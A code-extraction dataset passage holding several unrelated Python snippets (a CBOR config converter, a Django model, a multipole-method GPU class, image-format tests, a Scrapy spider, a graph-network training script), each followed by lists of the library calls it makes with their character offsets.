private_key = Key(byte_data, 'der', cbor_var_key, 'ECCPrivate')._asdict()
cbor_data['Keys'].append(private_key)
elif key in UPDATE_KEYS:
byte_data = struct.pack('%sB' % len(var), *var)
config_param = ConfigParam(byte_data, cbor_var_key)._asdict()
cbor_data['ConfigParams'].append(config_param)
else:
config_param = ConfigParam(var, cbor_var_key)._asdict()
cbor_data['ConfigParams'].append(config_param)
else:
print("Key %s not in KEY_MAP." % key)
return cbor_data
def convert_to_cbor(self):
vars = self.parse_c_file()
if not vars:
print("No variables parsed.")
else:
cbor_data = self.create_cbor_data(vars)
with open(self.cbor_file, 'wb') as out_file:
cbor2.dump(cbor_data, out_file)
| [
"os.path.isfile",
"pyclibrary.CParser",
"collections.namedtuple",
"cbor2.dump"
] | [((2216, 2259), 'collections.namedtuple', 'namedtuple', (['"""ConfigParam"""', "['Data', 'Name']"], {}), "('ConfigParam', ['Data', 'Name'])\n", (2226, 2259), False, 'from collections import namedtuple\n'), ((2274, 2327), 'collections.namedtuple', 'namedtuple', (['"""Certificate"""', "['Data', 'Format', 'Name']"], {}), "('Certificate', ['Data', 'Format', 'Name'])\n", (2284, 2327), False, 'from collections import namedtuple\n'), ((2334, 2387), 'collections.namedtuple', 'namedtuple', (['"""Key"""', "['Data', 'Format', 'Name', 'Type']"], {}), "('Key', ['Data', 'Format', 'Name', 'Type'])\n", (2344, 2387), False, 'from collections import namedtuple\n'), ((2693, 2713), 'os.path.isfile', 'os.path.isfile', (['path'], {}), '(path)\n', (2707, 2713), False, 'import os\n'), ((5254, 5285), 'cbor2.dump', 'cbor2.dump', (['cbor_data', 'out_file'], {}), '(cbor_data, out_file)\n', (5264, 5285), False, 'import cbor2\n'), ((3041, 3080), 'pyclibrary.CParser', 'CParser', (['[self.development_certificate]'], {}), '([self.development_certificate])\n', (3048, 3080), False, 'from pyclibrary import CParser\n'), ((3123, 3231), 'pyclibrary.CParser', 'CParser', (['[self.update_resource]'], {'macros': "{'MBED_CLOUD_DEV_UPDATE_ID': 1, 'MBED_CLOUD_DEV_UPDATE_CERT': 1}"}), "([self.update_resource], macros={'MBED_CLOUD_DEV_UPDATE_ID': 1,\n 'MBED_CLOUD_DEV_UPDATE_CERT': 1})\n", (3130, 3231), False, 'from pyclibrary import CParser\n')] |
from django.db import models
# Create your models here.
class Owner(models.Model):
Owner_id = models.AutoField
Owner_firstname = models.CharField(max_length=60)
Owner_lastname = models.CharField(max_length=60)
Owner_address = models.CharField(max_length=600)
Owner_email = models.CharField(max_length=100)
Owner_password = models.CharField(max_length=32)
Owner_dob = models.DateField()
Owner_mobileno = models.CharField(max_length=10)
Owner_gender = models.CharField(max_length=15)
Owner_license = models.ImageField(upload_to='img/Owner_License/')
Owner_agency = models.CharField(max_length=100)
Owner_city = models.CharField(max_length=30)
Owner_state = models.CharField(max_length=30)
Owner_country = models.CharField(max_length=30)
Owner_pincode = models.IntegerField()
isOwner = models.BooleanField(default=True)
def __str__(self):
return self.Owner_email + ": " + str(self.Owner_license) | [
"django.db.models.DateField",
"django.db.models.IntegerField",
"django.db.models.BooleanField",
"django.db.models.ImageField",
"django.db.models.CharField"
] | [((138, 169), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(60)'}), '(max_length=60)\n', (154, 169), False, 'from django.db import models\n'), ((191, 222), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(60)'}), '(max_length=60)\n', (207, 222), False, 'from django.db import models\n'), ((243, 275), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(600)'}), '(max_length=600)\n', (259, 275), False, 'from django.db import models\n'), ((294, 326), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (310, 326), False, 'from django.db import models\n'), ((348, 379), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(32)'}), '(max_length=32)\n', (364, 379), False, 'from django.db import models\n'), ((396, 414), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (412, 414), False, 'from django.db import models\n'), ((436, 467), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)'}), '(max_length=10)\n', (452, 467), False, 'from django.db import models\n'), ((487, 518), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(15)'}), '(max_length=15)\n', (503, 518), False, 'from django.db import models\n'), ((540, 589), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""img/Owner_License/"""'}), "(upload_to='img/Owner_License/')\n", (557, 589), False, 'from django.db import models\n'), ((609, 641), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (625, 641), False, 'from django.db import models\n'), ((659, 690), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (675, 690), False, 'from django.db import models\n'), ((709, 740), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (725, 740), False, 'from django.db import models\n'), ((761, 792), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (777, 792), False, 'from django.db import models\n'), ((813, 834), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (832, 834), False, 'from django.db import models\n'), ((849, 882), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (868, 882), False, 'from django.db import models\n')] |
import numpy as np
import tectosaur.util.gpu as gpu
from tectosaur.fmm.c2e import build_c2e
import logging
logger = logging.getLogger(__name__)
def make_tree(m, cfg, max_pts_per_cell):
tri_pts = m[0][m[1]]
centers = np.mean(tri_pts, axis = 1)
pt_dist = tri_pts - centers[:,np.newaxis,:]
Rs = np.max(np.linalg.norm(pt_dist, axis = 2), axis = 1)
tree = cfg.traversal_module.Tree.build(centers, Rs, max_pts_per_cell)
return tree
class FMM:
def __init__(self, obs_tree, obs_m, src_tree, src_m, cfg):
self.cfg = cfg
self.obs_tree = obs_tree
self.obs_m = obs_m
self.src_tree = src_tree
self.src_m = src_m
self.gpu_data = dict()
self.setup_interactions()
self.collect_gpu_ops()
self.setup_output_sizes()
self.params_to_gpu()
self.tree_to_gpu(obs_m, src_m)
self.interactions_to_gpu()
self.d2e_u2e_ops_to_gpu()
def setup_interactions(self):
self.interactions = self.cfg.traversal_module.fmmmm_interactions(
self.obs_tree, self.src_tree, self.cfg.inner_r, self.cfg.outer_r,
self.cfg.order, self.cfg.treecode
)
def collect_gpu_ops(self):
self.gpu_ops = dict()
for a in ['s', 'p']:
for b in ['s', 'p']:
name = a + '2' + b
self.gpu_ops[name] = getattr(self.cfg.gpu_module, name + '_' + self.cfg.K.name)
self.gpu_ops['c2e1'] = self.cfg.gpu_module.c2e_kernel1
self.gpu_ops['c2e2'] = self.cfg.gpu_module.c2e_kernel2
def setup_output_sizes(self):
self.n_surf_tris = self.cfg.surf[1].shape[0]
self.n_surf_dofs = self.n_surf_tris * 9
self.n_multipoles = self.n_surf_dofs * self.src_tree.n_nodes
self.n_locals = self.n_surf_dofs * self.obs_tree.n_nodes
self.n_input = self.src_m[1].shape[0] * 9
self.n_output = self.obs_m[1].shape[0] * 9
def float_gpu(self, arr):
return gpu.to_gpu(arr, self.cfg.float_type)
def int_gpu(self, arr):
return gpu.to_gpu(arr, np.int32)
def params_to_gpu(self):
self.gpu_data['params'] = self.float_gpu(self.cfg.params)
def tree_to_gpu(self, obs_m, src_m):
gd = self.gpu_data
gd['obs_pts'] = self.float_gpu(obs_m[0])
gd['obs_tris'] = self.int_gpu(obs_m[1][self.obs_tree.orig_idxs])
gd['src_pts'] = self.float_gpu(src_m[0])
gd['src_tris'] = self.int_gpu(src_m[1][self.src_tree.orig_idxs])
obs_tree_nodes = self.obs_tree.nodes
src_tree_nodes = self.src_tree.nodes
for name, tree in [('src', self.src_tree), ('obs', self.obs_tree)]:
gd[name + '_n_C'] = self.float_gpu(tree.node_centers)
gd[name + '_n_R'] = self.float_gpu(tree.node_Rs)
for name, tree in [('src', src_tree_nodes), ('obs', obs_tree_nodes)]:
gd[name + '_n_start'] = self.int_gpu(np.array([n.start for n in tree]))
gd[name + '_n_end'] = self.int_gpu(np.array([n.end for n in tree]))
def interactions_to_gpu(self):
op_names = ['p2p', 'p2m', 'p2l', 'm2p', 'm2m', 'm2l', 'l2p', 'l2l']
for name in op_names:
op = getattr(self.interactions, name)
if type(op) is list:
for i, op_level in enumerate(op):
self.op_to_gpu(name + str(i), op_level)
else:
self.op_to_gpu(name, op)
def op_to_gpu(self, name, op):
for data_name in ['obs_n_idxs', 'obs_src_starts', 'src_n_idxs']:
self.gpu_data[name + '_' + data_name] = self.int_gpu(
np.array(getattr(op, data_name), copy = False)
)
def d2e_u2e_ops_to_gpu(self):
gd = self.gpu_data
gd['u2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.u2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.m2m))
]
gd['d2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.d2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.l2l))
]
u2e_UT, u2e_E, u2e_V = build_c2e(
self.src_tree, self.cfg.outer_r, self.cfg.inner_r, self.cfg
)
gd['u2e_V'] = self.float_gpu(u2e_V)
gd['u2e_E'] = self.float_gpu(u2e_E)
gd['u2e_UT'] = self.float_gpu(u2e_UT)
d2e_UT, d2e_E, d2e_V = build_c2e(
self.obs_tree, self.cfg.inner_r, self.cfg.outer_r, self.cfg
)
gd['d2e_V'] = self.float_gpu(d2e_V)
gd['d2e_E'] = self.float_gpu(d2e_E)
gd['d2e_UT'] = self.float_gpu(d2e_UT)
def to_tree(self, input_orig):
orig_idxs = np.array(self.src_tree.orig_idxs)
input_orig = input_orig.reshape((-1,9))
return input_orig[orig_idxs,:].flatten()
def to_orig(self, output_tree):
orig_idxs = np.array(self.obs_tree.orig_idxs)
output_tree = output_tree.reshape((-1, 9))
output_orig = np.empty_like(output_tree)
output_orig[orig_idxs,:] = output_tree
return output_orig.flatten()
def report_interactions(fmm_obj):
dim = fmm_obj.obs_m[1].shape[1]
order = fmm_obj.cfg.surf[1].shape[0]
def count_interactions(op_name, op):
obs_surf = False if op_name[2] == 'p' else True
src_surf = False if op_name[0] == 'p' else True
return fmm_obj.cfg.traversal_module.count_interactions(
op, fmm_obj.obs_tree, fmm_obj.src_tree,
obs_surf, src_surf, order
)
n_obs_tris = fmm_obj.obs_m[1].shape[0]
n_src_tris = fmm_obj.src_m[1].shape[0]
level_ops = ['m2m', 'l2l']
ops = ['p2m', 'p2l', 'm2l', 'p2p', 'm2p', 'l2p']
interactions = dict()
for op_name in ops:
op = getattr(fmm_obj.interactions, op_name)
interactions[op_name] = count_interactions(op_name, op)
for op_name in level_ops:
ops = getattr(fmm_obj.interactions, op_name)
for op in ops:
if op_name not in interactions:
interactions[op_name] = 0
interactions[op_name] += count_interactions(op_name, op)
direct_i = n_obs_tris * n_src_tris
fmm_i = sum([v for k,v in interactions.items()])
logger.info('compression factor: ' + str(fmm_i / direct_i))
logger.info('# obs tris: ' + str(n_obs_tris))
logger.info('# src tris: ' + str(n_src_tris))
logger.info('total tree interactions: %e' % fmm_i)
for k, v in interactions.items():
logger.info('total %s interactions: %e' % (k, v))
| [
"logging.getLogger",
"numpy.mean",
"tectosaur.fmm.c2e.build_c2e",
"tectosaur.util.gpu.to_gpu",
"numpy.array",
"numpy.empty_like",
"numpy.linalg.norm"
] | [((118, 145), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (135, 145), False, 'import logging\n'), ((227, 251), 'numpy.mean', 'np.mean', (['tri_pts'], {'axis': '(1)'}), '(tri_pts, axis=1)\n', (234, 251), True, 'import numpy as np\n'), ((318, 349), 'numpy.linalg.norm', 'np.linalg.norm', (['pt_dist'], {'axis': '(2)'}), '(pt_dist, axis=2)\n', (332, 349), True, 'import numpy as np\n'), ((1980, 2016), 'tectosaur.util.gpu.to_gpu', 'gpu.to_gpu', (['arr', 'self.cfg.float_type'], {}), '(arr, self.cfg.float_type)\n', (1990, 2016), True, 'import tectosaur.util.gpu as gpu\n'), ((2061, 2086), 'tectosaur.util.gpu.to_gpu', 'gpu.to_gpu', (['arr', 'np.int32'], {}), '(arr, np.int32)\n', (2071, 2086), True, 'import tectosaur.util.gpu as gpu\n'), ((4161, 4231), 'tectosaur.fmm.c2e.build_c2e', 'build_c2e', (['self.src_tree', 'self.cfg.outer_r', 'self.cfg.inner_r', 'self.cfg'], {}), '(self.src_tree, self.cfg.outer_r, self.cfg.inner_r, self.cfg)\n', (4170, 4231), False, 'from tectosaur.fmm.c2e import build_c2e\n'), ((4420, 4490), 'tectosaur.fmm.c2e.build_c2e', 'build_c2e', (['self.obs_tree', 'self.cfg.inner_r', 'self.cfg.outer_r', 'self.cfg'], {}), '(self.obs_tree, self.cfg.inner_r, self.cfg.outer_r, self.cfg)\n', (4429, 4490), False, 'from tectosaur.fmm.c2e import build_c2e\n'), ((4704, 4737), 'numpy.array', 'np.array', (['self.src_tree.orig_idxs'], {}), '(self.src_tree.orig_idxs)\n', (4712, 4737), True, 'import numpy as np\n'), ((4892, 4925), 'numpy.array', 'np.array', (['self.obs_tree.orig_idxs'], {}), '(self.obs_tree.orig_idxs)\n', (4900, 4925), True, 'import numpy as np\n'), ((4999, 5025), 'numpy.empty_like', 'np.empty_like', (['output_tree'], {}), '(output_tree)\n', (5012, 5025), True, 'import numpy as np\n'), ((2920, 2953), 'numpy.array', 'np.array', (['[n.start for n in tree]'], {}), '([n.start for n in tree])\n', (2928, 2953), True, 'import numpy as np\n'), ((3002, 3033), 'numpy.array', 'np.array', (['[n.end for n in tree]'], {}), '([n.end for n in tree])\n', (3010, 3033), True, 'import numpy as np\n'), ((3802, 3863), 'numpy.array', 'np.array', (['self.interactions.u2e[level].obs_n_idxs'], {'copy': '(False)'}), '(self.interactions.u2e[level].obs_n_idxs, copy=False)\n', (3810, 3863), True, 'import numpy as np\n'), ((3995, 4056), 'numpy.array', 'np.array', (['self.interactions.d2e[level].obs_n_idxs'], {'copy': '(False)'}), '(self.interactions.d2e[level].obs_n_idxs, copy=False)\n', (4003, 4056), True, 'import numpy as np\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project: Fable Input Output
# https://github.com/silx-kit/fabio
#
# Copyright (C) European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: <NAME> (<EMAIL>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Multiwire Unit tests"""
from __future__ import print_function, with_statement, division, absolute_import
import unittest
import logging
logger = logging.getLogger(__name__)
import fabio
from ..utilstest import UtilsTest
class TestMpa(unittest.TestCase):
"""
Test classe for multiwire (mpa) images
"""
TESTIMAGES = [
# filename dim1 dim2 min max mean stddev
("mpa_test.mpa", 1024, 1024, 0, 1295, 0.8590, 18.9393),
]
def test_read(self):
"""
Test the reading of multiwire images
"""
for imageData in self.TESTIMAGES:
name, dim1, dim2, mini, maxi, mean, stddev = imageData
shape = dim2, dim1
logger.debug("Processing: %s" % name)
path = UtilsTest.getimage(name + ".bz2")[:-4]
obj = fabio.mpaimage.MpaImage()
obj.read(path)
self.assertAlmostEqual(mini, obj.getmin(), 2, "getmin [%s,%s]" % (mini, obj.getmin()))
self.assertAlmostEqual(maxi, obj.getmax(), 2, "getmax [%s,%s]" % (maxi, obj.getmax()))
self.assertAlmostEqual(mean, obj.getmean(), 2, "getmean [%s,%s]" % (mean, obj.getmean()))
self.assertAlmostEqual(stddev, obj.getstddev(), 2, "getstddev [%s,%s]" % (stddev, obj.getstddev()))
self.assertEqual(shape, obj.shape)
def suite():
loadTests = unittest.defaultTestLoader.loadTestsFromTestCase
testsuite = unittest.TestSuite()
testsuite.addTest(loadTests(TestMpa))
return testsuite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
| [
"logging.getLogger",
"unittest.TestSuite",
"unittest.TextTestRunner",
"fabio.mpaimage.MpaImage"
] | [((1074, 1101), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1091, 1101), False, 'import logging\n'), ((2354, 2374), 'unittest.TestSuite', 'unittest.TestSuite', ([], {}), '()\n', (2372, 2374), False, 'import unittest\n'), ((2480, 2505), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {}), '()\n', (2503, 2505), False, 'import unittest\n'), ((1745, 1770), 'fabio.mpaimage.MpaImage', 'fabio.mpaimage.MpaImage', ([], {}), '()\n', (1768, 1770), False, 'import fabio\n')] |
# -*- coding: utf-8 -*-
import scrapy
import codecs
import sys
#리눅스상에서 utf-8 로 파일에 내용을 기록하려면 시스템 기본 인코딩으 ㄹutf-8 로 설정해야함
reload(sys)
sys.setdefaultencoding('utf8')
# scrapy 에서 spider 는 crawling/scrapping을 담당하는 핵심부분
#crawling/scrapping 절차에 대한 정의를 하는 부분
class CurrSpider(scrapy.Spider):
name = 'currSpider'
start_urls = ['http://finance.naver.com/marketindex/?tabSel=exchange#tab_section']
def parse(self, response):
ranks = response.css('span.blind::text').extract()
titles = response.css('span.value::text').extract()
with codecs.open('curr.csv','w','utf-8') as f:
# 처리결과 저장하기위해
# movierank.csv 라는 이름으로 쓰기 모드로 open
# for i in range(0,4):
# rank = ranks[i].replace('\r\n', ' ')
# rank = ''.join(rank.split())
print(ranks)
# title = titles[i].replace('\r\n', ' ')
# title = title.strip().encode('utf-8')
print(titles)
f.write('%s,%s\n' % (ranks, titles))
f.close() | [
"codecs.open",
"sys.setdefaultencoding"
] | [((132, 162), 'sys.setdefaultencoding', 'sys.setdefaultencoding', (['"""utf8"""'], {}), "('utf8')\n", (154, 162), False, 'import sys\n'), ((565, 602), 'codecs.open', 'codecs.open', (['"""curr.csv"""', '"""w"""', '"""utf-8"""'], {}), "('curr.csv', 'w', 'utf-8')\n", (576, 602), False, 'import codecs\n')] |
import __init__
import os
#os.environ['LD_LIBRARY_PATH'] += ':/usr/local/cuda-11.1/bin64:/usr/local/cuda-11.2/bin64'
import numpy as np
import torch
import torch.multiprocessing as mp
import torch_geometric.datasets as GeoData
from torch_geometric.loader import DenseDataLoader
import torch_geometric.transforms as T
from torch.nn.parallel import DistributedDataParallel
from torch.utils.data.distributed import DistributedSampler
from config import OptInit
from architecture import DenseDeepGCN, CustomDenseDeepGCN
from utils.ckpt_util import load_pretrained_models, load_pretrained_optimizer, save_checkpoint
from utils.metrics import AverageMeter
import logging
from tqdm import tqdm
from parallel_wrapper import launch
import comm
from torch.utils.tensorboard import SummaryWriter
writer = SummaryWriter(log_dir='log/mlp4')
def train(model, train_loader, optimizer, criterion, opt, cur_rank):
opt.losses.reset()
model.train()
with tqdm(train_loader) as tqdm_loader:
for i, data in enumerate(tqdm_loader):
opt.iter += 1
desc = 'Epoch:{} Iter:{} [{}/{}] Loss:{Losses.avg: .4f}'\
.format(opt.epoch, opt.iter, i + 1, len(train_loader), Losses=opt.losses)
tqdm_loader.set_description(desc)
inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
gt = data.y.to(opt.device)
# ------------------ zero, output, loss
optimizer.zero_grad()
out = model(inputs)
loss = criterion(out, gt)
# ------------------ optimization
loss.backward()
optimizer.step()
opt.losses.update(loss.item())
def test(model, loader, opt, cur_rank):
Is = np.empty((len(loader), opt.n_classes))
Us = np.empty((len(loader), opt.n_classes))
model.eval()
with torch.no_grad():
for i, data in enumerate(tqdm(loader)):
inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
gt = data.y
out = model(inputs)
pred = out.max(dim=1)[1]
pred_np = pred.cpu().numpy()
target_np = gt.cpu().numpy()
for cl in range(opt.n_classes):
cur_gt_mask = (target_np == cl)
cur_pred_mask = (pred_np == cl)
I = np.sum(np.logical_and(cur_pred_mask, cur_gt_mask), dtype=np.float32)
U = np.sum(np.logical_or(cur_pred_mask, cur_gt_mask), dtype=np.float32)
Is[i, cl] = I
Us[i, cl] = U
ious = np.divide(np.sum(Is, 0), np.sum(Us, 0))
ious[np.isnan(ious)] = 1
iou = np.mean(ious)
if opt.phase == 'test':
for cl in range(opt.n_classes):
logging.info("===> mIOU for class {}: {}".format(cl, ious[cl]))
opt.test_value = iou
logging.info('TEST Epoch: [{}]\t mIoU: {:.4f}\t'.format(opt.epoch, opt.test_value))
def epochs(opt):
logging.info('===> Creating dataloader ...')
train_dataset = GeoData.S3DIS(opt.data_dir, opt.area, True, pre_transform=T.NormalizeScale())
train_sampler = DistributedSampler(train_dataset, shuffle=True, seed=opt.seed)
train_loader = DenseDataLoader(train_dataset, batch_size=opt.batch_size, shuffle=False, sampler = train_sampler, num_workers=opt.n_gpus)
test_dataset = GeoData.S3DIS(opt.data_dir, opt.area, train=False, pre_transform=T.NormalizeScale())
test_sampler = DistributedSampler(test_dataset, shuffle=False, seed=opt.seed)
test_loader = DenseDataLoader(test_dataset, batch_size=opt.batch_size, shuffle=False, sampler = test_sampler, num_workers=opt.n_gpus)
opt.n_classes = train_loader.dataset.num_classes
cur_rank = comm.get_local_rank()
logging.info('===> Loading the network ...')
model = DistributedDataParallel(CustomDenseDeepGCN(opt).to(cur_rank),device_ids=[cur_rank], output_device=cur_rank,broadcast_buffers=False).to(cur_rank)
logging.info('===> loading pre-trained ...')
model, opt.best_value, opt.epoch = load_pretrained_models(model, opt.pretrained_model, opt.phase)
logging.info(model)
logging.info('===> Init the optimizer ...')
criterion = torch.nn.CrossEntropyLoss().to(cur_rank)
optimizer = torch.optim.Adam(model.parameters(), lr=opt.lr)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, opt.lr_adjust_freq, opt.lr_decay_rate)
optimizer, scheduler, opt.lr = load_pretrained_optimizer(opt.pretrained_model, optimizer, scheduler, opt.lr)
logging.info('===> Init Metric ...')
opt.losses = AverageMeter()
opt.test_value = 0.
logging.info('===> start training ...')
for _ in range(opt.epoch, opt.total_epochs):
opt.epoch += 1
train_sampler.set_epoch(opt.epoch)
test_sampler.set_epoch(opt.epoch)
logging.info('Epoch:{}'.format(opt.epoch))
train(model, train_loader, optimizer, criterion, opt, cur_rank)
if opt.epoch % opt.eval_freq == 0 and opt.eval_freq != -1:
test(model, test_loader, opt, cur_rank)
scheduler.step()
if comm.is_main_process():
# ------------------ save checkpoints
# min or max. based on the metrics
is_best = (opt.test_value < opt.best_value)
opt.best_value = max(opt.test_value, opt.best_value)
model_cpu = {k: v.cpu() for k, v in model.state_dict().items()}
save_checkpoint({
'epoch': opt.epoch,
'state_dict': model_cpu,
'optimizer_state_dict': optimizer.state_dict(),
'scheduler_state_dict': scheduler.state_dict(),
'best_value': opt.best_value,
}, is_best, opt.ckpt_dir, opt.exp_name)
# ------------------ tensorboard log
info = {
'loss': opt.losses.avg,
'test_value': opt.test_value,
'lr': scheduler.get_lr()[0]
}
writer.add_scalar('Train Loss', info['loss'], opt.epoch)
writer.add_scalar('Test IOU', info['test_value'], opt.epoch)
writer.add_scalar('lr', info['lr'], opt.epoch)
logging.info('Saving the final model.Finish!')
def hola():
print('Hola')
def main():
opt = OptInit().get_args()
'''
This wrapper taken from detectron2 (https://github.com/facebookresearch/detectron2/blob/main/detectron2/engine/launch.py),
creates n_gpus processes and launches epochs function on each of them.
'''
launch(
epochs,
num_gpus_per_machine=opt.n_gpus,
num_machines=1,
machine_rank=0,
dist_url='auto',
args=(opt,)
)
#epochs(opt)
if __name__ == '__main__':
main() | [
"utils.metrics.AverageMeter",
"torch.nn.CrossEntropyLoss",
"torch.utils.data.distributed.DistributedSampler",
"logging.info",
"torch.utils.tensorboard.SummaryWriter",
"numpy.mean",
"config.OptInit",
"comm.is_main_process",
"comm.get_local_rank",
"numpy.isnan",
"parallel_wrapper.launch",
"utils... | [((799, 832), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', ([], {'log_dir': '"""log/mlp4"""'}), "(log_dir='log/mlp4')\n", (812, 832), False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((2714, 2727), 'numpy.mean', 'np.mean', (['ious'], {}), '(ious)\n', (2721, 2727), True, 'import numpy as np\n'), ((3013, 3057), 'logging.info', 'logging.info', (['"""===> Creating dataloader ..."""'], {}), "('===> Creating dataloader ...')\n", (3025, 3057), False, 'import logging\n'), ((3176, 3238), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['train_dataset'], {'shuffle': '(True)', 'seed': 'opt.seed'}), '(train_dataset, shuffle=True, seed=opt.seed)\n', (3194, 3238), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((3258, 3381), 'torch_geometric.loader.DenseDataLoader', 'DenseDataLoader', (['train_dataset'], {'batch_size': 'opt.batch_size', 'shuffle': '(False)', 'sampler': 'train_sampler', 'num_workers': 'opt.n_gpus'}), '(train_dataset, batch_size=opt.batch_size, shuffle=False,\n sampler=train_sampler, num_workers=opt.n_gpus)\n', (3273, 3381), False, 'from torch_geometric.loader import DenseDataLoader\n'), ((3503, 3565), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['test_dataset'], {'shuffle': '(False)', 'seed': 'opt.seed'}), '(test_dataset, shuffle=False, seed=opt.seed)\n', (3521, 3565), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((3584, 3705), 'torch_geometric.loader.DenseDataLoader', 'DenseDataLoader', (['test_dataset'], {'batch_size': 'opt.batch_size', 'shuffle': '(False)', 'sampler': 'test_sampler', 'num_workers': 'opt.n_gpus'}), '(test_dataset, batch_size=opt.batch_size, shuffle=False,\n sampler=test_sampler, num_workers=opt.n_gpus)\n', (3599, 3705), False, 'from torch_geometric.loader import DenseDataLoader\n'), ((3773, 3794), 'comm.get_local_rank', 'comm.get_local_rank', ([], {}), '()\n', (3792, 3794), False, 'import comm\n'), ((3800, 3844), 'logging.info', 'logging.info', (['"""===> Loading the network ..."""'], {}), "('===> Loading the network ...')\n", (3812, 3844), False, 'import logging\n'), ((4007, 4051), 'logging.info', 'logging.info', (['"""===> loading pre-trained ..."""'], {}), "('===> loading pre-trained ...')\n", (4019, 4051), False, 'import logging\n'), ((4091, 4153), 'utils.ckpt_util.load_pretrained_models', 'load_pretrained_models', (['model', 'opt.pretrained_model', 'opt.phase'], {}), '(model, opt.pretrained_model, opt.phase)\n', (4113, 4153), False, 'from utils.ckpt_util import load_pretrained_models, load_pretrained_optimizer, save_checkpoint\n'), ((4158, 4177), 'logging.info', 'logging.info', (['model'], {}), '(model)\n', (4170, 4177), False, 'import logging\n'), ((4183, 4226), 'logging.info', 'logging.info', (['"""===> Init the optimizer ..."""'], {}), "('===> Init the optimizer ...')\n", (4195, 4226), False, 'import logging\n'), ((4365, 4451), 'torch.optim.lr_scheduler.StepLR', 'torch.optim.lr_scheduler.StepLR', (['optimizer', 'opt.lr_adjust_freq', 'opt.lr_decay_rate'], {}), '(optimizer, opt.lr_adjust_freq, opt.\n lr_decay_rate)\n', (4396, 4451), False, 'import torch\n'), ((4482, 4559), 'utils.ckpt_util.load_pretrained_optimizer', 'load_pretrained_optimizer', (['opt.pretrained_model', 'optimizer', 'scheduler', 'opt.lr'], {}), '(opt.pretrained_model, optimizer, scheduler, opt.lr)\n', (4507, 4559), False, 'from utils.ckpt_util import load_pretrained_models, load_pretrained_optimizer, save_checkpoint\n'), ((4565, 4601), 'logging.info', 'logging.info', (['"""===> Init Metric ..."""'], {}), "('===> Init Metric ...')\n", (4577, 4601), False, 'import logging\n'), ((4619, 4633), 'utils.metrics.AverageMeter', 'AverageMeter', ([], {}), '()\n', (4631, 4633), False, 'from utils.metrics import AverageMeter\n'), ((4663, 4702), 'logging.info', 'logging.info', (['"""===> start training ..."""'], {}), "('===> start training ...')\n", (4675, 4702), False, 'import logging\n'), ((6557, 6670), 'parallel_wrapper.launch', 'launch', (['epochs'], {'num_gpus_per_machine': 'opt.n_gpus', 'num_machines': '(1)', 'machine_rank': '(0)', 'dist_url': '"""auto"""', 'args': '(opt,)'}), "(epochs, num_gpus_per_machine=opt.n_gpus, num_machines=1,\n machine_rank=0, dist_url='auto', args=(opt,))\n", (6563, 6670), False, 'from parallel_wrapper import launch\n'), ((953, 971), 'tqdm.tqdm', 'tqdm', (['train_loader'], {}), '(train_loader)\n', (957, 971), False, 'from tqdm import tqdm\n'), ((1891, 1906), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1904, 1906), False, 'import torch\n'), ((2645, 2658), 'numpy.sum', 'np.sum', (['Is', '(0)'], {}), '(Is, 0)\n', (2651, 2658), True, 'import numpy as np\n'), ((2660, 2673), 'numpy.sum', 'np.sum', (['Us', '(0)'], {}), '(Us, 0)\n', (2666, 2673), True, 'import numpy as np\n'), ((2684, 2698), 'numpy.isnan', 'np.isnan', (['ious'], {}), '(ious)\n', (2692, 2698), True, 'import numpy as np\n'), ((5138, 5160), 'comm.is_main_process', 'comm.is_main_process', ([], {}), '()\n', (5158, 5160), False, 'import comm\n'), ((6213, 6259), 'logging.info', 'logging.info', (['"""Saving the final model.Finish!"""'], {}), "('Saving the final model.Finish!')\n", (6225, 6259), False, 'import logging\n'), ((1941, 1953), 'tqdm.tqdm', 'tqdm', (['loader'], {}), '(loader)\n', (1945, 1953), False, 'from tqdm import tqdm\n'), ((3136, 3154), 'torch_geometric.transforms.NormalizeScale', 'T.NormalizeScale', ([], {}), '()\n', (3152, 3154), True, 'import 